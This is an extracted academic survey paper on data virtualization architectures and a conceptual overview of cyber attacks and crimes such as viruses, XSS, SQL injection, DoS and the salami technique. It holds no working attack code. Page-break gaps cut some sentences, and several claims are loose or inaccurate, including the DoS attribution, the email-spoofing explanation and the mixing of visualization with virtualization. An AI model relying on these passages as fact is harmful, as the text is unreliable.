Emergent Trends and Challenges in Big Data Analytics, Data Mining, Virtualization and Cyber Crimes: An Integrated Global Perspective- II

(1)

33 | International Journal of Computer Systems, ISSN-(2394-1065), Vol. 03, Issue 01, January, 2016

Emergent Trends and Challenges in Big Data Analytics, Data Mining,

Virtualization and Cyber Crimes: An Integrated Global Perspective- II

Gurdeep S Hura

Department of Mathematics and Computer Science, University of Maryland Eastern Shore, Princess Anne, MD 21853

gshura@umes.edu

Abstract

As stated in the first part of the paper, we presented a state-of-the-art starting from the concepts used in Big data analytics starting with how this concept evolved, its applications, available tools, limitations and the current status so that researchers and developers can understand the how this new technology can be used for new applications and also deriving new technology, tools and frameworks. After introducing the basic concepts in big data analytics, the paper focused on the data mining techniques that have been used in the past for offering systematic approach for system analysis now find its use in a big way in data representation, data collection and data analysis of multimedia applications. With different forms and formats of data from different sources, the newer data mining techniques for collection and analysis of huge amount of multimedia data need to be introduced. It is hoped these new efficient and formal data mining techniques will be used for understanding the big data analytics with a view to offer easy understanding, easy data formatting, interpreting and extracting useful information from collected data in the applications. We also presented various unresolved issues and problems dealing with big data analytics and data mining, challenges and possible future applications. The paper further also presents the future research initiatives.

I. ABSTRACT(PARTII)

The second part II of the paper presents state-of-the art of remaining two important technologies virtualization and data security that have implemented in big data analytics.

One of the implementation phases for big data solutions is data processing. There are many methods that can be used to data processing. A simple and user friendly visual and dynamic representation of data can be implemented by data virtualization. This method provides not only easy representation of data, but also dynamic behavior of the data movement and helps to extract useful information from the data. The virtualization tools represent the data processing process in a very simple way for data analysis. The paper discusses different architectures of virtualization tool, methodologies, main frame virtualization, guidelines and various available abstraction tools of virtualization that have been used in big data applications.

Business and technology professionals and practitioners are deeply concerned about data security. Since data is coming from different devices like mobile data generation, real-time connectivity, digital business, and other sources have changed the entire environment difficult and harder to protect the data assets over internet. We have seen some security measures that have been implemented in big data analytics and it is expected that the future big data applications have an increasingly crucial and important role in providing data security. Recent years have seen some efforts in data analytics that have implemented various counter measures for data security such as intrusion detection, differential privacy, preventive measures, authentication, digital watermarking, malware countermeasures and many other measures. In order to

implement operational strategies under serious crisis, data security becomes very critical. Some organizations and professionals are having a little bit of difficulties to be competitive in the absence of data security and are engaged in including advanced analytics capabilities that will manage privacy and security challenges. By following this approach, they are able to create confidence in clients/customers/consumer with some level of trust. In order to provide reassurance to customers/consumers around privacy and data security issues, it is important to establish a framework that will not only provide security but it evaluates and meet business, big data technology and needs of consumers/customers.

With a brief discussion and role of data security in big data applications, this paper describes in brief the cyber malicious attacks and crimes. The paper presents the challenges and problems associated with creating a secured communication environment over internet for big data applications. Further, it describes briefly various attacks and crimes over internet known as Cyber Attacks and Crimes. The paper also presents all the known Cyber Attacks, cyber-crimes that may affect the data processing, data mining techniques and virtualization tools of big data applications over internet. After understanding these attacks and crimes, paper presents how the big data implementation includes security issues in new applications. Further, it also presents Cyber security analysis for big data applications.

II. BACKGROUNDOFBIGDATAANALYTICS ANDDATAMINING(PARTI):

(2)

techniques, virtualization frameworks and data security for various applications like public sector, manufacturing, retails, healthcare, weather and scientific applications, etc. The paper further described operations in big data, discussion of known big data applications, and various available open source tools that have been used to implement and solve big data applications and implements various data mining techniques.

After introducing the basic concepts in big data analytics, the paper focused on the data mining techniques that have been used in the past for offering systematic approach for system analysis now find its use in a big way in data representation, data collection and data analysis of multimedia applications. With different forms and formats of data from different sources, the newer data mining techniques for collection and analysis of huge amount of multimedia data were introduced. The paper also described briefly the suitable data mining techniques and presents how some of the existing techniques will be redefined with a view to use in applications like multimedia data applications, social networking, scientific weather data and many other similar applications. The paper presented in conclusion various unresolved issues and problems dealing with big data analytics and data mining, challenges and possible future applications. The paper further also presents the future research initiatives.

This paper presents state-of-the art of remaining two important technologies virtualization and data security that have implemented in big data analytics in the following sections.

III. DATA VISUALIZATION

A. Basic concepts and definitions of data virtualization Data visualization is one of the important steps in data analysis that allows the developers to present the data in clear and efficient format for the users. Data visualization technique translates or maps the data or information into a visual objects such as lines, bars, points and other similar symbols that are contained in computer graphics [1-15, 18].

It is one of the steps in data analysis or data science and focusses on conveying ideas effectively, both aesthetic form and functionality and providing insights into a rather sparse and complex data set by communicating its key-aspects in a more intuitive way. Generally developers often fail to achieve a balance between form and function by not designing proper visualization which actually links the information.

Data visualization is closely related to information graphics, information visualization, scientific visualization, exploratory data analysis and statistical graphics. In the last couple of decades, this has become an active area of research, teaching and development of big data sets. It deals with presentations of articles, resources, displaying of connections, data, news, websites, mind maps, tools, services and other data-related representations. We need to identify vision to implementation that should include issues like performance and support for enterprise wide use of providing the linked data services. The vision must include the importance of demonstration of business value of linked data services like involving executives, other IT teams, business end users early and often in proof of value

The big data with different characteristics, sources internal or external is becoming one of the big challenges in its management with companies. We have seen traditional information management technologies and approaches that provide integration of data and play an important role in most of these companies. Data virtualization software offers a viable solution to speed up integration, accurate interpretation, derivation of useful information and improve decision-making capabilities in applications requiring big data from multiple source systems.

There exist a number of data representation architectures that have been used in data virtualization tool. The visualization architecture tool has been successfully used in a variety of applications and has provided the solutions in a very useful and easily understandable format. We discuss some of these architectures of virtualization tools along with their applications, features and limitations for the representation of big data and extraction of useful information from the data in the following section.

B. Data Virtualization Architecture Deployment Options Data virtualization defines layered architectures for the implementation of big data representation and extraction of data. The layers include Data Abstraction Layer, Data Services Layer, Globally-distributed Data Virtualization Layer, and Logical Data Warehouse. There exist different virtualization framework that have found their applications in big data analytics. The following section describes in brief Cisco‟s virtualization framework associated query management that provides optimized queries for records and attributes that can be defined. Once we have identified virtualization tool and its query management, we then introduce new methodologies to implement big data applications. .

(i) Cisco‟s Data Abstraction Reference Architecture [1-2, 7-8]

This architecture consists of the following layers that provide platform for the building data abstraction using the data virtualization platform for any data applications.

Application Layer – It maps the business Layer into the format which each Data Consumer (user or application) wants to consume the data. In other words, it means it provides mapping of formatting it into XML for Web services or creating views with different alias names that match the way the consumers are used to seeing their data.

Business Layer – This layer provides standard or other acceptable formats for describing key business attributes such as customers, products, formatted data, financial and other related attributes. These attributes are defined by defining a set of logical views which are being used on multiple consumers by the application layer.

(3)

We have seen traditional information architectures that have been developed and are being employed. However these architectures are not flexible and agile to reconfigure to adopt changes in business strategies and modifications. Data virtualization seems to be a suitable framework that can accommodate these changes and needs into the architecture.

(ii) Cisco data virtualization‟s query optimization algorithms and techniques

These techniques provide optimized query features and options to provide all low level details of business requirements and needs. These techniques are very efficient and offer timely and faster the needed information for any business strategies. Currently, these have been accepted widely by a number of industries for solving the big data sets. For more details, please refer [1-2, 7]. The following is a set of modules being supported by the above discussed architecture:

i) Data Federation module of Cisco data virtualization offers the data federation that virtually integrates the stored data in memory to provide the complete behavior and environment of data without the cost and overhead of physical data consolidation.

ii) Data Discovery module of Cisco data virtualization addresses Data Proliferation and offers a unique feature of automating data entity and relationship identification. Further it accelerates data modeling in such a way that data analysts may clearly understand how the data sets have been related and distributed.

iii) Data Abstraction module of Cisco data virtualization converts complex data is into a very simple form. It is a very strong and powerful data abstraction tool that transforms the complex data into very simple form so that its underlying structures can be mapped into common standard semantics for easy processing and its use in the application.

iv) Data Access, Caching and Delivery module of Cisco Data Virtualization Improves data availability, offers flexible standards-based data accesses, supports different caching and delivery options for different types of consumers for accessing the information.

v) Data Governance module of Cisco data virtualization‟s maximizes control and it ensures data security, data quality and 7x24 operations to maximize control.

vi) Layered Architecture module of Cisco data virtualization enables rapid change and offers a loosely- coupled information architecture. This rapid development tool provides the flexibility and agility needed to accommodate any changes or modifications in requirements or changes in business strategies of the big data application.

C. Data Virtualization Implementation Methodology: [1-13, 18]

After defining virtualization framework and query management, we introduce steps needed in implementation methodologies for solving big data applications. It has to ensure that customers are satisfied and using their

experiences, the methodology should be able to adopt feedback. In other words, the methodology must offer the following features and capabilities:

 Providing guidelines for identifying the objectives of big data applications effectively and efficiently  Options of verification and validation for optimal

success in the applications

 Options of securing maximum returns from the methodology

 Flexible support for integration with any system design, development and deployment processes.  Offer various internal and external resources, tools,

abstract knowledge levels and easy implementation for predicting the outcomes and self- sufficiency, easy adoption and re-configurability capabilities.

The methodology is based on the same concept of software lifecycle and includes well defined processes. Some of the material discussed here has been derived from [4, 8, 9, 11, 15]

The implementation methodology consists of the following well defined structured process. There exist a number of tools and software packages for each of these processes.

 Design and development  Configuration management

 System architecture and solution architecture  Strategy and planning management

 Prototype and deployment

 Integrated Testing and improvement management

For the implementation and design of data virtualization, we start with strategy planning management where we need to define and develop an appropriate framework that supports needs and objectives for data virtualization. The following steps are required for its implementation:

Step I: First, we have to identify and define data virtualization strategies and policies that data virtualization will offer, its structure, its usage pattern, specific project use cases, interfacing, and other related opportunities.

Step II. Once we decide for data virtualization, we need to identify the technical specifications and proper data integration decision tools required for its implementation. These tools are being used to define the structures to assess multiple data virtualization frameworks along with their features. Once we decide the framework we want to consider, it allow the users to organize and prioritize the project ownership, level of difficulty and advantages, return of investment and other performance oriented measures.

(4)

Further, technical skills and expertise need to be defined for the team for their roles and responsibilities, the productivity measurement, job descriptions, training for IT professionals to see the capabilities of data virtualization, hands-on development and configuration needs, knowledge transfer process, saving time, promoting efficiency in long run and returns of the investments.

Step IV. We need to create a multi-faceted training session to educate and train wide range of IT staff on data virtualization. Initially, we have to make the IT staff aware of the capabilities of data virtualization and thereafter appropriate training sessions for them for the undertaken projects. During the implementation process of the entire project, more and more hands-on development with experts from data virtualization and partner system integrators will help IT staff in gaining all the needed data virtualization skills. This training session can be defined in a training catalog that contains all the training sessions on daily basis and also are defined as a set of modules.

Step V. We need to define data governance policies that list all the possible and known undefined activities and also a list of activities from the execution of these activities in a ripple way. The security mechanism for data virtualization when used over internet must implement authentication, authorization, encryption, auditing requirements, transaction logging, configurations, deployment, etc.

Step VI. We also need to Composite Professional Services which will include well defined understanding of governance and data visualization. These services can be used to establish appropriate and suitable set of policies needed for data virtualization that should be used by IT staff as these two have to on the same page to take the full advantages of data virtualization, its capabilities and training for using it economically, efficiently and effectively. This tool provides the structure needed to assess multiple data virtualization opportunities relative to one another. We should use it to help us organize and prioritize our entire data virtualization project pipeline including project owners, level of difficulty, and potential return on investment.

The above was a brief description on virtualization implementation methodologies that have been used in some projects. Although there does not seem to have a standardized methodologies, it became quite necessary to identify general guidelines that can be used to use the suitable methodology for a particular big data applications.

D. Guidelines for Data Virtualization Implementation [13-15, 18]:

We have to establish our data virtualization strategy and usage policies by first understanding what data virtualization has to offer. We also have to learn how data virtualization is used at other organizations including general usage patterns and specific project use cases.

The following guidelines may be useful in deciding whether should a company adopts data virtualization for their big data applications.

Davis and Eve defined some of these guidelines as the best practices for the adoption of virtualization in their big data application [5, 13]:

1) Ensure that interested companies or organizations quickly adopt data virtualization for the implementation of intelligent storage component and create a bigger concept.

2) Ensure that common data model that offers consistency, high quality and create new business users should be considered and implemented to create productive and confidence among the potential users.

3) Ensure that we establish governance that should include how to manage the data virtualization environment for providing shared infrastructure and services.

4) Ensure that we create environment for providing benefits of data virtualization, allocate consulting time for business users and offer the services

5) Ensure that we establish performance tuning, and test solution scalability early in the development process. We may consider high performance computing with massively parallel processing capability to handle query performance on high-volume data and data analysis.

6) Ensure that we take phased approach to implement data virtualization and then gradually implement the more advanced federation capabilities of data virtualization.

7) Ensure that the company has prepared governance and policies for adopting the data virtualization

8) Ensure that the company has prepared the basic training and hands-on skills for the IT staff so that appropriate recommendations and decisions can be implemented by them to solve the big data projects

The above said guidelines for the use of data virtualization tools will allow the users to implement it in an efficient, effective and economical way. However, many organizations and companies are showing strong interests in using these tools for solving their big data applications and one of the reasons for this is due to lack of evidence and case studies, experiences with success in technical and economic advantages.

As stated above, recent years have seen great interests and efforts in implementing big data analytic and data mining applications in the mainframe environment. In particular, the social networking, scientific data in embedded systems, Medical and Health based applications have become very popular and are encouraging the researchers and developers to explore new applications in mainframe environment. The following section explains how virtualization methodology has been implemented for mainframe applications.

E. Mainframe Data Virtualization [9-10. 14-15]

(5)

are facing is about the use big data for business intelligence, analytics, cloud computing, mobile computing and initiatives. IBM‟s new mainframe OZ systems are helping the above mentioned new technologies due to enormous amount of computing and storage.

The issues with the implementation of big data on mainframes include data representation, data processing, data replication, use of servers, connectors to point-to-point integration, data manipulation and storage. Some of the integrated methods of data management are expensive, enormous growth and minimum customer‟s expectations for data of real-time systems.

Some of the issues of big data can be reduced by using data virtualization technique for the scattered data across the enterprise. It allows multiple and scattered data sources can be accessed by a single logical interface that allows separate an external interface from internal implementation and it allows high degree of flexibility to changes. It is important to know that in data visualization, data does not move physically because it uses only the metadata to create a virtual view of the data source/s, providing a faster, more agile way to access and combine data from multiple sources – mainframe, distributed, Cloud and Big Data. It is a part of implementation that data virtualization solution resides by default under the platform like a distributed Linux, UNIX, Windows (LUW) systems [4]

There are different approaches of transforming the mainframe into data platform framework Rocket Software takes a different approach. One of these approaches is based on Rocket Data Virtualization Server (DVS): an IBM system z data virtualization solution that maintains mainframe connectivity and integration. It contains all the components needed for real-time, universal access to data, regardless of location or format. It eliminates redundant point-to-point integration for improved performance, scalability and manageability via its capability of reducing the complexity of mainframe data integration. It provides value of mainframe data to transform non-relational mainframe data into relational format that be used by Business Intelligence and Business analytics applications.

The development environment simplifies data discovery, mapping and the creation of virtual tables; standards based connectivity ensures secure, reliable integration from any platform or data source; access mainframe databases and programs, as well as non-mainframe data and application sources; a high performance, multi-threaded, z/OS resident runtime delivers highly scalable, low cost data virtualization, with up to 99% of its processing running in the mainframe zIIP specialty engine. The mainframe data virtualization solution thus provides users or applications to access any type of data and data provider independent of any formation or location of the data [4]

The above was a brief discussion in virtualization architecture, frameworks and methodologies for big data analytics to implement data virtualization for various big data applications on different platforms including mainframe. These virtualization frameworks are very powerful and have become basis for the development of tools that can provide data analysis, data extraction, data interpretation for useful information and many more

features. Based on interesting results and solutions for big data applications, some virtualization abstraction tools have been introduced and have been tried in some application. The following section describes some utility tool to be a part of suit of virtualization tools.

F. Data Virtualization abstraction tools [1, 12-15, 18]

The data virtualization tool can be used as a utility tool that may help in implementing data integration processes. Recent year have seen it use in a number of industries to create a platform for dynamic linked data services with each element that can have ability of linking, browsing, subscribing through a unified source in spite of the fact that both data and sources may change dynamically. It has also been used for defining layered information architecture like data abstraction layer, data service layer, Globally distributed data virtualization layer, logical data warehouse etc. and this meets the needs of business process and changes

Data abstraction plays an important role in reducing the gap between business needs and source data‟s original form and format. This method and practice implementation of data virtualization platform provides the following features and benefits:

 Offers simple information access

 Offers common business view of the data applications via an enterprise information model.  Offers more accurate data

 Offers consistent security rules on data across all data sources and consumers via a unified security framework.

 Provides end-to-end control to manage consistency across multiple sources and consumers.

 Supports business and IT change insulation where it can adopt the changes and relocate the physical data sources without impacting information users. The work in the area of developing more utility for abstraction tools is continuing and we are seeing a number of new tools that are being used in some of the existing applications.

The above was a brief discussion on various techniques of data mining and virtualization that are being used or can be used in big data analytics. Both are playing a very crucial role in providing the solutions of big data. It is expected that data mining will play even more vital role not only in mining, representing the big data in a simple readable and friendly manner, but its predictive analysis technique and assessment ability of complex data will enable new data analysis techniques to be introduced for extracting and interpreting the data in a very useful way. Further virtualization is helping the data mining-based analysis to be more accurate and easy to understand the outcome of processed data in a very simple way. It offers very efficient and effective method of extracting and interpreting the data.

(6)

Internet should be highly secured, confidential and dependable. The following section introduces a number of Cyber Malicious Attacks and Cyber Crimes that may affect the big data applications for deriving their solutions and deployment. In order to understand how malicious attacks work, we will first present attacks and crimes, understand how these affect the normal working of big data analytics, the consequences of attacks on our implementation and then present techniques how these attacks can be prevented. Finally, we present cyber-crime analysis that is being used by law enforcement agencies for legal investigations.

G. Cyber Crime, Cyber Attack and Crime Analysis [16-21]

As discussed above how the big data analytics implements data mining and virtualization in the implementation and predicting the solutions of big data applications. The data analytics also support data security and it has been observed in some of the above applications how data analytics has explored intrusion detection, differential privacy, digital watermarking, data integrity, filtering, firewalls and malware countermeasures. In order to understand the basics of data security, the chapter provides a brief introduction of basic components of a computer, data processing algorithms, interconnectivity with networks and Internets, secured communication over internet for various applications, etc. Further, chapter discusses how a computer or any mobile device connected to internet can be used as a tool for malicious attacks, cyber-crimes, and also various counter measures that can be implemented to protect the resources of computers. Also, chapter summarizes various preventive measures that have been used in data analytics in one way or the other and still new counter measures are being investigated and implemented.

A computer can be defined as consisting of five main components as input (which converts data and instructions from human-readable to machine-readable codes), central processing unit (that controls and coordinates the machines and the data based on its operating instructions, or program, also known as software), software (that is qualitatively different in that it governs how these data are processed), logical and memory units (that perform calculations, decision-making and storage functions in response to commands from the control unit), and the output unit (that converts processing results back into human-readable language or symbols).

Virtually all these components of a computer system are vulnerable to invasion and abuse. The input can change the data at input; operations and systems programmers can manipulate data and software; transmission of data over common carrier lines can be tapped; and both authorized and unauthorized users can interfere with computer operations at terminals.

Internet was made available to the public in early nineties for it‟s us and since then, we have seen a variety of applications like e-mail, file transfer, remote login, internet accesses, browsers, distributed computing, communication (audio, text, pictures, images, attachments, on-line shopping, on-line financial transactions, etc.). At the same time, internet crime has become one of the most serious

and challenging issues with network professional and developers how to ensure that the use of internet is a safe communication environment? A number of investigation processes along with needed tools have been introduced and are being used by various law enforcement agencies, organizations and government agencies at Federal, State and County levels. The investigation process in general requires a dedicated team that performs the investigation using well defined steps and tools for any internet crime in their respective organizations.

IV. DATA PROCESSING IN COMPUTERS

The data processing over computer plays an important role in various business sectors, government agencies, private and corporate sectors and many other organizations. All the transactions, banking, corporate records, various activities in government agencies, and other areas are based on computers, information security and internet. The computer under its susceptibility to external attacks leaves the auditor for verifying the accounts, and can be operated from a distance using different forms of communications over internet. The losses from computer crime cannot be established without any clear understanding of what such crime entails, and an accurate record of its occurrence. Governments or corporates should have some process that needs to be defined and considered in the event of any computer-related illegal activities that may not be acceptable. This may in turn have an effect on the degree to which computer abuse is reported.

As with the automobile, the criminal use of computer technology has increased the vulnerability of the community, and to the extent that the definition of crimes and the enactment of prohibitions are directed to the protection of the community, computer technology is a legitimate area of penal concern. Laws must not only enable the redress of wrongs or the punishment of the wrongdoer, they must also proscribe conduct; the complexity of the means for misconduct afforded by computer technology merits its special treatment.

When the computer is used as an instrument of crime, we see familiar landmarks for identifying the conduct as criminal where it is being used as metaphorical weapon at any financial institutions. But when the computer is the object of crime, this is not only limited to theft of the computer itself, but include substantial value but that are not tangible and whose legal status is unclear. For example, the information stored in a computer can be misused and retrieved without damage to the computer and without the knowledge of the owner of its use. So great is the capacity of a computer and so valuable are its services that use of it even for short periods of time can be worth a lot. The degree to which these intangibles can or should be protected is a significant issue for the law. This is what happens when computer crimes takes place.

(7)

sensitive information from our computers that are connected to internet. The following explains the basic definition cyber terrorism, types of cyber malicious attacks and cyber-crimes that have effect on the implementation of big data solutions and big data analytics as whole.

The following section describes all the known cyber-attacks and cyber-crimes and readers may find it interesting to find all these in this chapter. It is possible that some of these attacks and crimes may not be applicable to big data analytics directly or indirectly, but it would be a good survey of all these attacks and crimes.

A. Cyber Terrorism

This crime is caused by terrorist activities like intentional use of computers, networks and large disruption of computer networks over internet by the means of tools such as computer viruses for causing destruction and harm for personal objectives. Many of the minor incidents of cyber terrorism have been identified and documented. Another way of looking at cyber terrorism is to experience any terror created in people‟s minds while when similar terror activities are created over Internet, it is known as cyber terrorism. In some other publications, different names for Cyber Crimes have been used such as: cybercrime, cyberwar, terrorism and some related names. In Cyber terrorism we deal use of electronics means to attack on computers and information over internet. B. Cyber Malicious Attacks

Cyber-attacks have been defined as a means of making the system useless and take criminal or political advantages. There are many types of cyber-attacks, but in the literature, the following attacks have been recognized as main Cyber-attacks as discussed below: For details, please refer to [16-21].

i) Virus

One of the ways for transmitting malicious code in one way into any computer is via cyber-crime virus. It is defined as a self-replicating code embedded within another program known as host. It is caused by a small program that is designed to spread from one computer to another, interfere with computer operation and leave infections. It can destroy the operation of hardware, software and files stored in computers. In general, all the viruses are attached with executable program known as malicious and these programs will not affect the computers until these are either run, open or executed and can be spread by human being by sending it via emails or attachments within emails.

Let‟s see how virus works? When user tries to execute his/her host that has been infected by virus, the virus code embedded with attachment executes. It tries to find another executable program/code stored in computer‟s file system. Once it finds any executable program, it replaces that program by itself (virus infected program/code). After this action, virus now allows the host program to execute. The viruses are spread via e-mail attachments. The virus program occupies disk space, consumes CPU power and can affect the computer‟s file systems and any other personal information stored. There is a large number commercial antivirus software packages available that can detect and destroy the viruses before it can cause any damage to the computers. We have to be careful while

installing antivirus software packages as our computers may be infected by fake antivirus applications that may route our packets to any application we want to use through its own intermediate server.

ii)Worm

It is defined as a self-contained program that looks for security weak points or holes and use as entry point to spread into computer. This crime is caused by a small program similar to virus and is considered as sub class of virus. A worm is similar to a virus and is considered to be a sub-class of a virus. The worm also spreads from computer to computer without the help of human being and as such it travels from one computer to another computer via file or information transport mechanism. One of the nicest features of worm is that it replicates itself after its execution and as such it can send large number of replicated files from one computer to another.

A worm can send a copy of itself to any email address and after travelling to another computer will replicate itself into a number of copies on that computer and so on and it consumes significant memory, the network bandwidth and affects the working and functioning of web servers in one way or the other. The effect of worm could be time consuming and tedious as the IT department has to defend computers from further attacks, investigate the computers that have been effected, install patches, clean the computers and bring them back into Internet.

This worm was launched in April 2004 and uses the same method of locating security weak point or hole for entering into computers. Its effect is rather minimal compared to other worms in the sense that the infected computers shut down after booting.

iii) Instant messaging worm

This type of worm is targeted for instant messaging systems and as such did not have much effect in 2001 (when it was launched). But now with over 800 million using instant messaging, the effect of this worm has become greater as those infected computers may not provide the Microsoft instant messaging services until appropriate patches are installed.

iv) Conficker:

This type of worm was launched in Nov 2008 on Windows computers and has a unique feature of propagating through computers in a different ways. Different variants of this worm have introduced since Nov 2008. The latest version of worm looks for computers with weak password protection and is able to propagate through USB flash memory devices and shared files on local area networks. The current security measures are strong enough to a have minimum effect of this worm on the computers.

v)Cross-site Scripting:

In this type of attack, the client-side script is injected into web site. When user tries to access that web site, the user‟s browser executes the script which will record the presence of any cookies, user‟s activities, or perform any other actions defined in the script.

(8)

Many of the genuine or legitimate web sites have been infected by some kind of software that will allow the software (not needed) to be downloaded and is known as drive-by-demand. In some cases, user may see another window while working on web site popping-up and asking our permission to download the software. The user may consider this as a part of the current web site he/she is visiting. According to Google Anti Malware Team, more than 300 million URLs that initiate drive-by-downloads

vii) Trojan Horse

This crime is caused by a small program that steals passwords to online games, changes icons on the desktop, delete the files, destroying any information store on computer. Sometimes it also performs actions unknown to. This program also creates a backdoor program on our systems which can be accessed by intruders who can access all the information and any other confidential information. This type of crime does not either reproduce by infections other files or self-replicate.

viii) Backdoor Trojan

This program allows the attacker to get access to user‟s computer. It gives a feel that it is cleaning malware program from the computer, but it is actually installing a spyware

ix) Spam

One of the most powerful applications of internet has been e-mails and it is estimated that over one billion e-mail accounts around the globe are active. It is also estimated that over 300 billion e mail messages are being sent over internet per day. Spam displaces the legitimate e-mail message and creates a suspicious environment of the users to guess the genuine email message different types of networks through a program specifically designed for searching computers with poor security and are connected to internet. About 90% of the spam is communicated via bot headers can that create Based on a number of surveys, it has been seen that the number of span is increasing at an alarming rate and in fact, in 2009, it shows that over 90% of emails over Internet came out to be spam.

There is a significant wastage of processing, internet bandwidth and storage over mail servers and this constitutes a wasted productivity to the tune of over billions of dollars. A number of spam filters have been introduced for Internet Service Providers (ISPs) that block spam from reaching user‟s mailboxes.

x)Phishing and spear phishing

This attack is intended to get the access of computers and retrieve the personal information and other sensitive files. In this type of attack, an attacker makes use of botnet to send e-mails to a large number of users. The IP address of this type of mail looks genuine and advises the recipients of e-mail to provide requested information such as login name, password and other personal information. This information is then used for identity theft. The number of phishing attack is increasing every year.

Spear phishing attack is another form of phishing attack where the attacker selected a particular category of

recipients for stealing their personal information. Some of the groups may include: elderly people, retired people, etc.

xi) SQL Injection

This type of attack is intended to attack web applications that are driven and maintained by data bases. The attacker can access the application and tries to insert SQL –based query into the text. The database will return the needed personal information via a string in response to SQL query.

xii) Denial-of-Service (DoS) and Distributed Denial–of-Service (DDoS)

This type of cyber-attack is politically motivated attack which takes place between computers with a view to undermine various features of internet communications such as integrity, confidentiality, security measures, availability, critical vulnerable infrastructures, etc. These attacks are typically initiated by the government agencies, terrorist organizations, and other groups who are politically motivated for these attacks with a view to infect opponent‟s infrastructures and confidential policy documents.

Denial-of- Service attacks (DOS attacks) involves flooding a computer with more requests than it can handle. This causes the computer (e.g. a web server) to crash and results in authorized users being unable to access the service offered by the computer. The attackers usually make web servers such as banks, credit card gateways, root name servers, business, corporations, and many others.

A denial-of-service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.

A DoS attack may include execution of malware that may create following effects on the services being offered by hosts over Internet: use of all the processing capabilities of processors thus preventing any work from occurring, trigger errors in the microcode of the machine, trigger errors in the sequencing of instructions forcing the computer to behave abnormally, exploit errors in the operating system, crash the operating system etc.

There exists a different type of crimes such TCP/IP SYN attack, PING of Death, Flood server with URL requests, etc. In TCP/IP SYN, handshake protocol is implemented to establish connection between client and server where client requests, server acknowledges and waits and then client acknowledges before the transmission of data. In PING of death, many clients try to make connection with PING server and cause significant traffic. In the flood server with URL requests, there may be a situation where one client or multiple clients may be making a request at the same time causing distributed Denial-of-service (DDoS) attack (usually in financial sectors).

Cyber-crimes

(9)

and to seek to place them in an appropriate context in which their impact can be judged.

The following section will describe each of the cyber-crimes that affect the data analysis, virtualization and other data mining techniques as applied to big data applications. .

i) Malware

A significant security weakness of unencrypted W-Fi networks can be found in the extension of one of the popular browsers as Firefox. The security weakness can also be found in computers but malicious software known as Malware can penetrated through these security measures and consume significant amount of CPU, occupy a large amount of space on our disk, destroy valuable data in file systems. Once the attackers have access to our computers via malware, our computers can be used as storage for stolen credit card information, can be used as a launch pad for transmitting spam, denial-of-service attacks on other servers.

ii)Salami technique

This automated crime is caused due to by stealing small amounts of assets from a large number of sources without noticeably reducing the whole information. It is caused due to make alteration or changes in one case for financial institutions, banks or organizations. This type of crime is usually committed via a series of many small actions which gets turned into a bigger which becomes difficult to be detected. The reason for this may be due to the fact that a bigger action may be unlawful. One of the ways this crime can be committed in financial sector could be take smaller amount like penny by rounding off the figures and accumulate a big amount over a period of time. The implementation of small actions can be automated so that the automatic collection of small amount can be performed like publication sector, film industry Television, and other similar systems.

This crime is based on the concept of divide and conquers process of threats and alliances to be used in a variety of application e.g. business, organizations, politics, etc. Let‟s take an example bank where the processing of interest rates is changed in such a way that the calculations are calculated for rounded to the nearest integer value for all the accounts. The automated program collects all the values after rounding off and relays via funneling to the intruder. It is very likely that this program may not be detected as the small amount of interest will not be coverable.

iii) Scavenging

This crime is caused by securing of information that may be left in or around a computer system after it has been used for a job. The time-sharing computers are involved in for storing and retrieving the data in different memory devices such as tapes where previous job provides scavenging entering of small data to read the entire tape. Code numbers, passwords and encryption devices may be used to prevent any unauthorized use.

iv) Denial-of-service

We have discussed above this as an attack, but in some books and publications, this is also considered as a

cyber-crime. It is caused by any attempt to make machine or network resources unavailable to the users who are using them. It is usually consist of interrupt or make unavailable the services of hosts temporarily, or indefinitely or suspend available that are connected to internet. Some of the services affected by this crime include: Consumption of computational resources, such as bandwidth, memory, disk space, or time, Disruption of configuration information, such as routing information, Disruption of state information, such as unsolicited resetting of Transmission Control Protocol (TCP) sessions, Disruption of physical network components, Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

In general, this type of crime are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. This crime violates the proper use policy defined by Internet Architecture Board (IAB) and also accepted use policies defined by Internet Service Providers. It also violates the laws of some of the countries where these are being in used.

v)Financial crime

These crimes are caused due to cyber cheating, credit card frauds, money laundering, hacking into financial institutes and banks, accounting scams, computer manipulations, etc.

vi) On-line gambling

There exist a large number of web sites which offer online gambling. It is interesting to note that some of the countries have made these web sites legal and as such online gambling is considered as legal and safe. Owners of these web sites are licensed and hence are safe to operate these activities safely in those countries.

vii) Intellectual property Crimes

These crimes are caused due to software piracy, copy right infringement trademark‟s violation, theft of programs and source code, intellectual property violations (music, poems, inventions, etc).

viii) Forgery

This crime is caused due to counterfeit currency notes, academic certificates, mark sheets, revenue stamps that are created by using computers, printers, scanners and associated software.

ix) Sale of illegal articles

This crime is caused by selling illegal items such as illegal drugs, narcotics, weapons, pornography materials, wildlife, information about availability of these items and other illegal articles over Internet via posting on auction web sites, bulletin boards, and any other similar web sites.

x) Cyber pornography

(10)

or any other web sites over Internet through any computing devices.

xi) Email bombing

This crime is caused due to sending of a large number of e-mails to selected target or selected server (e.g. company‟s email server, internet service providers, etc.) that crashes these servers.

xii) Email spoofing

This is caused due to the fact that the email looks like originating from the known source but instead it has been sent from other source. In other words, the IP address has been captured by attackers who in turn is using that send their own message.

xiii) Cyber defamation

This is caused due to defamation or slander via digital media namely computers and Internet, harming the reputation of any individual person, business, product, service, organization, government, religion, culture, nation, inventions, family, any criticism without any evidence, and any other form of defamation. It is not a specific offense, misdemeanor or tort. Different countries have different laws and punishments for this crime, but the fundamental rights for this crime are defined in UN Declaration of Human Rights and also in Fundamental Human Rights (European Union).

xiv) Cyber Stalking

It can be defined as a technologically-based "attack" on someone who has been targeted specifically for that attack for reasons of anger, revenge or control. This crime is caused by making use of internet, e-mail and any other digital media and device for harassment, embarrassment and humiliation of the victim, ruining the victim's credit score, harassing family, friends and employers to isolate the victim, scare tactics to instill fear, identity theft, threats, vandalism, solicitation for sex or collecting information that may be classified as harassment or threatening, false accusation and similar acts. Cyber stalking may be offline or online and both are criminal offenses. Cyberstalking may be considered as a form of cyberbullying and many a times these are used interchangeably for each other as both are caused more or less by same set of activities.

